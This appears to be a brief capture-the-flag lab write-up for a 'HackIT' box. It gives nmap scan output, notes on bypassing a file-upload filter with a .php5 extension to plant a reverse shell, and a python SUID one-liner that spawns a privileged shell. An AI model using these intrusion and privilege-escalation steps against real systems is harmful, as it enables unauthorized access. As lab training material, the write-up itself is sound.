nmap:
Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-04 16:56 GMT
Nmap scan report for ip-10-10-73-179.eu-west-1.compute.internal (10.10.73.179)
Host is up (0.00077s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (EdDSA)
80/tcp open  http
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
MAC Address: 02:DB:1B:57:CE:4D (Unknown)


with gobust i found /uploads and /panel.
panel allows me to update a file. First try was php was not allowing it  but it allowed php5
then i upload a reverse shell and got a shell as www-data
i got the user flag

SUID
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

